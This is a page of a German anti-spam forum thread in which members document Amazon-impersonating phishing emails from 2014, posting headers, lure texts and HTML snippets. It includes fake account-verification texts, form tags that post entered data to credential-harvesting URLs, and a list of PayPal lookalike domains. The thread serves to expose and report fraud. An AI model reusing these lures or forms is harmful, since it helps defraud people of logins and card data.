Seite 4 von 16 ErsteErste ... 2345614 ... LetzteLetzte
Ergebnis 31 bis 40 von 160

Thema: Amazon-Phishing

  1. #31
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Und wieder von der Russenmafia:


    header:
    01: Apr 2014 xx:xx:xx CEST
    02: Received: from sec.elinox.de (elinox.de [85.25.208.156])
    03: by xxxxx (Postfix) with SMTP ID: [ID filtered]
    04: for xxxxx; Wed, 30 Apr 2014 xx:xx:xx +0200 (CEST)
    05: Received: from [146.0.42.36] (ca166.calcit.fastwebserver.de
    06: [146.0.42.36])
    07: by sec.elinox.de
    08: ; Wed, 30 Apr 2014 xx:xx:xx +0200

    gecrackt: *** [der Provider weiß Bescheid]
    Guten Tag,

    Amazon überbietet stets die aktuellen Sicherheitsstandards für den
    Onlinehandel.
    Daher setzen wir, nicht nur im Bereich Online-Shopping, weltweit Standards.

    Generell gilt, die Sicherheitsmaßnahmen sollen Ihren Einkaufsvorgang
    nicht unnötig
    verzögern. Daher bitten wir Sie, aktiv an der aktuellen
    Präventivmaßnahme mitzuwirken
    um Ihre nächste Bestellung nicht durch eine Sicherheitsmaßnahme zu
    verzögern.

    whois:amazon-onlineschutz.com Zum Formular (über den
    Sicherheitsserver)

    Ab 02.05.2014 sollten Sie, mit einem unverifiziertem Account,
    Verzögerungen von bis zu 24
    Stunden bei Ihrer nächsten Bestellung einkalkulieren.
    Freundliche Grüße vom Sellercenter

    Ihre Daten werden vertraulich behandelt und nicht an Dritte weitergegeben.

    Freundliche Grüße

    Kundenservice
    amazon.de
    IP: 95.163.107.207 ---> RU-DINET
    Geändert von Mittwoch (07.01.2015 um 15:53 Uhr) Grund: Gecrackte Mailadresse entfernt
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  2. #32
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Auf dieser IP lauert noch ein ganzes Nest:

    wtrustedshops.com
    paypal-konto-online.com
    135601.paypal-feedback.org
    542753.paypal-konto-online.com
    feedback-paypal.com
    paypal-antispam.com
    1042528.paypal-schutz24.com
    wwwpaypalde.com
    1103238.paypal-ruckbuechung.com
    1084019.paypal-schutz24.com
    paypal-ostersuche.com
    1147175.paypal-ruckbuechung.com
    510576.paypal-konto-online.com
    paypal-aktionen.com
    1146593.paypal-ruckbuechung.com
    gewerbe-paypal.com
    173651.gewerbe-paypal.com
    424096.paypal-carecenter.com
    387983.paypal-fragen.com
    34454.paypal-ostersuche.com
    neuigkeiten-paypal.com
    1018163.paypal-schutz24.com
    627169.paypal-onlinekonto.com
    772733.wwwpaypalde.com
    153634.newsletter-paypal.org
    926958.onlinestatus-paypal.com
    70312.paypal-ostersuche.com
    534901.paypal-konto-online.com
    124959.paypal-osterei.com
    81847.paypal-osterei.com
    44507.paypal-osterei.com
    134958.neuigkeiten-paypal.com
    paypal-newsletter.com
    paypal-onlinestatus.com
    33941.paypal-osterei.com
    998702.onlinestatus-paypal.com
    41915.paypal-osterei.com
    141217.newsletter-paypal.org
    130033.feedback-paypal.com
    573057.paypal-newsletter.com
    694065.ruckbuechung-paypal.com
    449613.paypal-carecenter.com
    194517.feedback-paypal.com
    407435.paypal-fragen.com
    125135.newsletter-paypal.org
    paypal-osterei.com
    1104983.paypal-ruckbuechung.com
    paypal-de-support.com
    144048.newsletter-paypal.org
    ruckbuechung-paypal.com
    newsletter-paypal.org
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  3. #33
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Tja, wenn der Drecksserver unter indischer Verwaltung komplett gecrackt wurde, nützen auch Trostpflästerchen (wie einige Unterverzeichnisse löschen) nichts mehr. Die Dreckschleuder komplett plattmachen, sonst wird halt eine Domain nach der anderen auf der Dreckskiste gecrackt:


    header:
    01: Received: from S15400199.home ([82.165.129.32]) by mx-ha.gmx.net (mxgmx113)
    02: with ESMTP (Nemesis) ID: [ID filtered]
    03: Received: from User ([81.134.132.58]) by home with MailEnable ESMTP; Thu, 01
    04: May 2014 xx:xx:xx +0100

    IP: 82.165.129.32 ---> s15400199.onlinehome-server.info

    Sehr geehrter Kunde,

    Nach einigen verdächtigen Transaktionen, hat Ihre Konto aus
    Sicherheitsgründen gesperrt worden.
    Um wieder Zugriff zu erhalten, müssen Sie Ihre Informationen zu
    aktualisieren.

    Bitte laden Sie das Dokument in einer E-Mail-Anhang, und überprüfen Sie
    Ihre Daten.
    Wenn Sie diese E-Mail ignorieren, wird Ihre Konto vorübergehend gesperrt
    werden.

    Thank you,
    Kundendienst.
    im HTML Anhang:

    [HTML]<form method="post" id="ap_register_form" novalidate="novalidate"action="http://tractorparts.co.in/images/o/neu.php" onsubmit="">[/HTML]

    IP: 208.91.199.100 ---> bh-5.webhostbox.net
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  4. #34
    Senior Mitglied
    Registriert seit
    17.07.2005
    Ort
    Mitteldeutschland
    Beiträge
    1.564

    Standard


    header:
    01: Received: from websrv1.pedrosoft.net ([67.222.143.72]) by
    02: COL004-MC4F7.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.22712);
    03: Fri, 27 Jun 2014 xx:xx:xx -0700
    04: Received: from rs213075.rs.hosteurope.de ([5.35.250.253]:51188)
    05: by websrv1.pedrosoft.net with esmtpa (Exim 4.82)
    06: (envelope-from <direkt [at] amazon.de>)
    07: ID: [ID filtered]
    08: for ***; Fri, 27 Jun 2014 xx:xx:xx +0430
    09: Mime-Version: 1.0
    10: From: Amazon <direkt [at] amazon.de>
    11: To: *** <***>
    12: Subject: Amazon.de - Datenabgleich

    Sehr geehrter Amazon Kunde,
    Sicherheit hat für Amazon.de höchste Priorität. Wir sorgen für ein sicheres Zahlungssystem, schützen Karteninhaber, Händler,unsere Mitglieder sowie Unternehmen und tragen zum Wachstum bei.

    Amazon.de Datenabgleich (Verifizierungsvorgang)

    Bitte beachten Sie folgende Hinweise:

    Aufgrund sicherheitstechnischen Mängeln bei Online-Anbieter sind wir gezwungen, mit unseren Kunden einen Datenabgleich durchzuführen.

    Sollten Sie eine Visa, Master oder AmericanExpress-Card besitzen, bitten wie Sie eine
    Adress- und Kartenverifizierung durchzuführen um eine Account/ Kartensperre zu verhindern.

    Bitte führen Sie Ihren Datenabgleich baldmöglichst aus. Sollten Sie nicht innerhalb der nächsten 8 Tage Ihren Datenabgleich ausführen, sperrt unser System automatisch Ihren Amazon-Zugang unwiederuflich.

    Achtung: Eine Reaktivierung Ihres Amazon.de Kontos ist in diesem Fall nichtmehr möglich!

    Klicken Sie hier oder öffnen Sie die Datei in ihrem Email-Anhang. Wählen Sie dazu Ihren Internet-Browser. (Firefox/ InternetExplorer) und wählen "Öffnen mit" aus!
    Tragen Sie alle von geforderten Daten ein und klicken dann auf "Weiter"!
    Amazon bedankt sich für Ihre Mitarbeit
    Als Anhang gibt es eine 81,2kByte grosse Datei amazon.html .

    Code:
     <form name="creditForm" method="post" action="http://cc.ingdibasbank.ru/de/amazon/login/amazon_check.php" >
    whois:ingdibasbank.ru

  5. #35
    Neues Mitglied
    Registriert seit
    03.07.2014
    Beiträge
    2

    Standard

    Hi,

    bin neu hier und hab ne ziemlich fiese amazon spoof mail bekommen, wo der Name und Anschrift von jemanden missbraucht wird und er somit, als Betrüger dargestellt wird. Würde es gerne posten, aber ohne selber wiederum Daten des Betroffenen preis zu geben. Ich würde mich sehr über eine PM freuen, wie ich dies am besten mache. Vielen Dank.

  6. #36
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Für solche Fragen im Forum sind die Mods zuständig, vielleicht meldet sich ja einer.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  7. #37
    Mittwoch
    Gast

    Standard

    Zitat Zitat von Lagoon Beitrag anzeigen
    bin neu hier und hab ne ziemlich fiese amazon spoof mail bekommen, wo der Name und Anschrift von jemanden missbraucht wird und er somit, als Betrüger dargestellt wird.
    Hallo Lagoon,
    willkommen im Forum! Wenn Du Bedenken hast, persönliche Daten bekannt zu geben, kannst Du Dich mit der Spoofmail via Kontaktformular an die Forenleitung wenden. Sie wird sich dann dann ansehen und entscheiden, ob und was ggf. wie veröffentlicht werden kann.

    Falls Du allerdings mit "Name und Anschrift von jemandem" meinst, dass die Spoofmail als Absender einen Namen und eine Mailadresse verwendet, die garantiert nichts damit zu tun hat, ist der Kontakt zur Forenleitung nicht erforderlich. Absenderangaben in Mails sind beliebig fälschbar. Ich kann Dir ohne weiteres eine Mail schicken, die als Absenderangabe "Barack Hussein Obama II <obama@whitehouse.gov>" trägt, ohne dass ich Zugriff auf das Mailkonto des amtierenden US-Präsidenten habe. Mehr zum Thema findest Du im Antispam-Wiki Meine Emailadresse wurde als Absender missbraucht.

    Schönen Gruß
    Mittwoch

  8. #38
    Neues Mitglied
    Registriert seit
    03.07.2014
    Beiträge
    2

    Standard

    Hallo,

    vielen Dank für die Antworten. Ich meine nicht die Adresse aus dem Header, hier wurde in die Amazon Mail der reale Name und die volle Anschrift gepackt. Quasi die Identität gestolen und somit vorgetäuscht diese Person hätte etwas illegales getan. Ich bekomme ständig spoof und teilweise recht gut gemachte, aber so etwas habe ich noch nicht gesehen. Vielen Dank, ich machs über Kontaktformular. Viele Grüße.

  9. #39
    Mittwoch
    Gast

    Standard


    header:
    01: Received: from server1.campula.de ([109.239.57.34]) by mx-ha.web.de (mxweb108)
    02: with ESMTP (Nemesis) ID: [ID filtered]
    03: Wed, 09 Jul 2014 xx:xx:xx +0200
    04: Received: from elektro-mark.de (f051.fuchsia.fastwebserver.de [217.79.181.51])
    05: by server1.campula.de (Postfix) with ESMTP ID: [ID filtered]
    06: for <***@web.de>; Wed, 9 Jul 2014 xx:xx:xx +0200 (CEST)
    07: Message-ID: [ID filtered]
    08: Date: Wed, 09 Jul 2014 xx:xx:xx -1000
    09: From: "Amazon Support" <info [at] elektro-mark.de>
    10: User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20090105
    11: Thunderbird/2.0.0.19
    12: X-Accept-Language: en-us
    13: MIME-Version: 1.0
    Betreff: Bestaetigen Sie Ihren Amazon-Account
    Guten Tag,
    aufgrund des schwerwiegenden "Heartbleed-Exploits" (einer massiven Sicherheitslücke die viele Websites betraf, leider auch Amazon.de),
    ist es zu Ihrer Sicherheit erforderlich, dass Sie die Daten Ihres Amazon-Kundenkontos verifizieren.

    Sollten Sie die Verifizierung nicht innerhalb der nächsten 14 Tage durchführen, sind wir gezwungen ihr Amazon-Kundenkonto dauerhaft und unwiderruflich zu sperren.

    Zum Verifizierungsprozess gelangen Sie unter folgendem Link / durch folgenden Button:

    Zur Verifizierung (whois:http://www.amazon-umstellung.com/)


    Diese überprüfung ist für Sie selbstverständlich vollkommen kostenlos.

    Mit freundlichen Grüssen,
    Amazon.de

    Dies ist eine automatisch versendete Nachricht. Bitte antworten Sie nicht auf dieses Schreiben, da die Adresse nur zur Versendung von E-Mails eingerichtet ist.
    Diese Adresse wurde nicht nur zur Versendung dieses Schreibens eingerichtet, da wurde vermutlich irgendwas gecrakt. Der Header ist bis zur IP whois:217.79.181.51 stimmig, und die gehört zu fastwebserver.de. Die Angabe eines User Agents ist in einem Header eher ungewöhnlich. Ich vermag allerdings nicht zu sagen, was genau wo geknackt wurde.

    Schönen Gruß
    Mittwoch

  10. #40
    Mitglied Avatar von Rava
    Registriert seit
    13.02.2007
    Ort
    near 127.0.0.1
    Beiträge
    304

    Ausrufezeichen Wahrscheinlich Kreditkarten Phishing - Vorgeblich von Amazon Customer Service


    header:
    01: Return-Path: soultug [at] sites.nearlyfreespeech.net
    02: Received: from sitemail.nearlyfreespeech.net ([208.94.116.219]) by
    03: mx-ha.gmx.net (mxgmx108) with ESMTPS (Nemesis) ID: [ID filtered]
    04: for <******@gmx.de>; Fri, 01 Aug 2014 xx:xx:xx +0200
    05: Received: by sitemail.nearlyfreespeech.net (Postfix, from userID: [ID filtered]
    06: ID: [ID filtered]
    07: To: *****@gmx.de
    08: Subject: Amazon.de Kundenservice
    09: X-NFSN-Site: soultug.com
    10: X-NFSN-Path:
    11: /wp-content/themes/village/cache/external_8c1d1f772413a01b202c97865b3b28d9.php
    12: From: =?UTF-8?B?YWNjb3VudGNoZWNrQGFtYXpvbi5kZQ==?= <accountcheck [at] amazon.de>
    13: Content-type: text/html; charset=utf-8
    14: Reply-To: accountcheck [at] amazon.de
    15: Message-ID: [ID filtered]
    16: Date: Fri, 1 Aug 2014 xx:xx:xx +0000 (UTC)
    17: Envelope-To: <*****@gmx.de>
    18: X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
    19: X-GMX-Antivirus: 0 (no virus found)
    20: X-UI-Filterresults: notjunk:1;

    <Ironie>na klar, GMX! Kein Spam, kein Junk..!</ironie>. *kopfschütteln*

    [HTML]<html>
    <head>
    <title></title>
    </head>
    <body>
    <div>
    <b>Wir brauchen Ihre Hilfe</b><br>
    <br> <!--9351322-->
    aufgrund der steigenden Zahlungsausfalle mittels Lastschrift- und Rechnungszahlung,<br>
    ist es in Zukunft leider nicht mehr moglich, eine Zahlung bei Amazon.de mit diesen Zahlungsarten ohne hinterlegte Kreditkarte zu tatigen. Daher ist es notwendig, dass alle Kunden eine Kreditkarte als Zahlungsmittel hinterlegen.<br>
    <br>
    Sollten Sie bereits eine Kreditkarte hinterlegt haben, bitten wir Sie, die bereits hinterlegte Kreditkarte zu verifizieren. Sollten Sie noch keine Kreditkarte besitzen, legen wir Ihnen gerne die Amazon VISA-Kreditkarte ans Herz. Nutzen Sie zur Verifizierung bitte den folgenden Link: <a href="http://securecheckinfo.com">Zum Sicherheitsverfahren</a> - <a href="http://securecheckinfo.com">http://securecheckinfo.com</a><!--6494837-->
    <br><br>
    Bitte beachten Sie, dass Sie Ihr Amazon.de-Kundenkonto ohne hinterlegte Kreditkarte in Zukunft nicht mehr nutzen konnen.<br>
    <br><br>
    <b><b>Mit freundlichen Grußen,<br>
    Ihr Amazon.de Kundenservice</b><br>
    </div>
    <!--3884100-->
    <img x-noattach="1" src="http://c.statcounter.com/99****7/0/78jsh****4/1/" alt="" height="1" width="1" border="0">
    </body>
    </html>[/HTML]

    Ich werde alle Typos in spam/phising/whaever mails nicht mehr kommentieren, da ich stark vermute das manche/einige Spammer auch hier mit anwesend sind und solche Hinweise verwenden um in den nächsten Versionen ihrer Mails eben die Fehler zu korrigieren...


    Ist statcounter.com bekannt dafür bekannt Statistiken oder Erfolgsquoten für Spammer zu vertreiben? geht es darum zu sehen ob diese Email geöffnet wurde? Ich vermute, der Zahlen und Zeichensalat am Ende ist eine Referenz zu meiner gespammten Email Adresse?

    Sollte man denen davon erzählen? Ich denke die Phisher haben so etwas wie einen Account bei statcounter...

    =============================
    (Ich habe mir einige Threads angeguckt ob das hier da besser reinpaßt, aber "Amazon Phishing" schien mir nicht wirklich 100% zu passen [habe aber auch nicht alle Artikel in dem Thread gelesen, kann also falsch liegen damit!
    Deswegen dies als neuen Thread.
    Bitte, Mods & Admins falls sich da falsch liege mit, bitte in den richtigen / passendsten Thread verschieben. Danke!)
    Gruß, Rava

    Malware auf Wind-Systemen besser nicht lokal speichern!
    Ebenso Links zu Phishing-Sites nur betreten, wenn Ihr wisst was Ihr da macht!

Seite 4 von 16 ErsteErste ... 2345614 ... LetzteLetzte

Ähnliche Themen

  1. Amazon
    Von Fixi63 im Forum 5.1 Allgemeines & Smalltalk
    Antworten: 22
    Letzter Beitrag: 12.02.2010, 16:59
  2. Spam von Amazon Clouds
    Von Trulliator im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 5
    Letzter Beitrag: 24.08.2009, 10:36
  3. Update your amazon Account
    Von cmds im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 0
    Letzter Beitrag: 11.12.2006, 12:53
  4. Auch Amazon bleibt nicht verschont vom Phishing
    Von SpamRam im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 0
    Letzter Beitrag: 25.03.2006, 19:59
  5. amazon
    Von webeinspunktnull im Forum 4.2 Diskussion
    Antworten: 1
    Letzter Beitrag: 29.04.2004, 19:31

Stichworte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen